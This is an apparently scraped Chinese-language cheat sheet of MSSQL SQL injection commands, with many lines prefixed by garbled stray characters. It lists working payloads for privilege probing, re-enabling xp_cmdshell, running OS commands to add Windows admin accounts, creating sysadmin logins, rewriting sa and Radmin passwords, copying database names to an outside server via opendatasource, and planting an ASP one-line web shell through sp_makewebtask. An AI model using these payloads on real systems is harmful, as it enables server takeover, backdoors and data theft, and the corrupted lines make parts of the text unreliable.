常用的一些注入命令

admin

//看看是什么权限的
4 \. x+ p( U  X; {' l. C( S  Tand 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
$ q( ?( }2 _9 p$ m7 T8 b
! x: l; C* o/ x1 E4 Y6 s# U1 I//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
% i4 t* Y0 Q/ I  NAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
8 J/ y& A* [4 V# x% @5 S

数字类型
# B( ?3 ?5 V" F( Q" A3 f/ Kand char(124)%2Buser%2Bchar(124)=0

- ^; ?- s9 z/ \. w8 t8 a3 O字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

' v7 T3 M: h9 f5 q/ w搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

' I/ O3 [! N- J9 N. F# L爆用户名
and user>0
* x0 p2 V( }: R0 H- S9 b' and user>0 and ''='

) {( ^, m. g! R; C& y6 ]检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
9 h9 w4 c8 @* @! c5 h' HAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

5 m% W  x- J) E; Q检测是不是MSSQL数据库
1 }3 F5 U- J8 j: D" C. kand exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--

# m/ a. o7 m0 J/ @恢复 xp_cmdshell
( }  ?( Q5 }6 ]. f* L;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


0 E, k/ }1 F3 T2 ?' v! h1 \3 i/ Kselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

  G  q- n" O, [6 d0 B8 k3 Q/ v( A//-----------------------
//       执行命令
//-----------------------
首先开启沙盘模式：
1 I2 c) l$ B5 x3 n! Uexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
& }3 e8 \% d/ f. ]0 [! g; y7 C7 Oselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
2 E- _0 b$ C6 k6 n, M: Z
! L; \& @; q5 d$ Y9 r执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
0 k: t# Q- C5 a
2 f1 {) y$ z8 Z: K0 {% ?$ \4 UEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
' e; K9 Z& l, [. {2 `) @
0 s! |5 a' @: N5 e9 {( r/ L判断xp_cmdshell扩展存储过程是否存在：
4 @' c9 X: N- t" O# t, dhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

4 B& ]: y7 a' G" U6 l7 C% ]" n写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

/ ]0 @0 O& ^4 w# \; {! PREG_SZ
( g* i/ w  {9 q/ ]! M' t
读注册表
( r- N4 s" V0 Qexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
  G2 ~$ Q& p# g; c% A3 e! P# M# Aexec master..xp_dirtree 'c:\winnt\system32\',1,1
' V0 T1 j& ]& R, F) F" ]
3 L4 X5 l$ V" L) A2 A
0 g9 c; S* X5 G数据库备份
backup database pubs to disk = 'c:\123.bak'

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

4 s; l# b# q1 ], K5 R: c

更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
7 j' a2 a# C6 X. cexec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin
. f6 Y- J) X0 @1 B) w; \" Z& A
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

8 D0 g+ o+ M4 {+ w/ E7 O添加扩展存储过过程
8 p; ~0 \5 d; q2 y8 i2 h0 C( @( jEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
- i, b$ J; E( x+ U

  d2 h9 u  Q' r3 _停掉或激活某个服务。
( z! J% x6 z' \2 M0 U+ K
8 R0 ~& f! T6 \9 h& l- q1 Rexec master..xp_servicecontrol 'stop','schedule'
2 Z" h" F& f5 J3 Wexec master..xp_servicecontrol 'start','schedule'
7 N5 t! Y0 N# ^1 X
dbo.xp_subdirs
; M# b6 @; m6 C' f% C+ V
只列某个目录下的子目录。
4 `! E7 E# o$ {$ bxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
, Z1 B. b5 T$ \4 c所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
. V0 @6 e0 T$ j2 w  ?'C:\Inetpub\wwwroot\SQLInject\login.asp',
  W7 H: v# J& I+ E'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

9 R0 x3 I2 h: cxp_terminate_process
% \* M3 y- e/ y0 Z- E% d0 g, k: D+ c
停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
; t: i/ V0 f0 d' W. I5 U, Q% V
xp_terminate_process 2484

/ I- ?; E5 j- yxp_unpackcab
: @+ Y7 o0 Q3 |4 D5 c& ^4 |' h
( ^  j& P' v' e  j7 E5 _. L解开压缩档。

1 d; F9 I  }' Yxp_unpackcab 'c:\test.cab','c:\temp',1
0 e* S/ i! B/ M1 S/ d

- R/ K. a$ d! {% C9 j某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
* u8 {, M5 P/ A3 ?$ |6 A( M2 S
1 d& w6 G% X1 |4 ?) g0 [! m: vcreate database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

/ U2 L4 w  C3 v9 S! T2 Y9 Z9 K//得到数据库名
. i: Y9 `/ s) `) winsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

5 m, m2 a8 f1 ]/ C$ ~
$ ^6 J0 ?3 d7 }1 Y. r//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
. }' b! Q' Y0 m  @" l' r5 @
用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
" o! D, f2 {# G/ L% S
//更新表内容
4 d" L9 `4 _- p# n" DUpdate films SET kind = 'Dramatic' Where id = 123

5 u  a  _2 s* X  y//删除内容
delete from table_name where Stockid = 3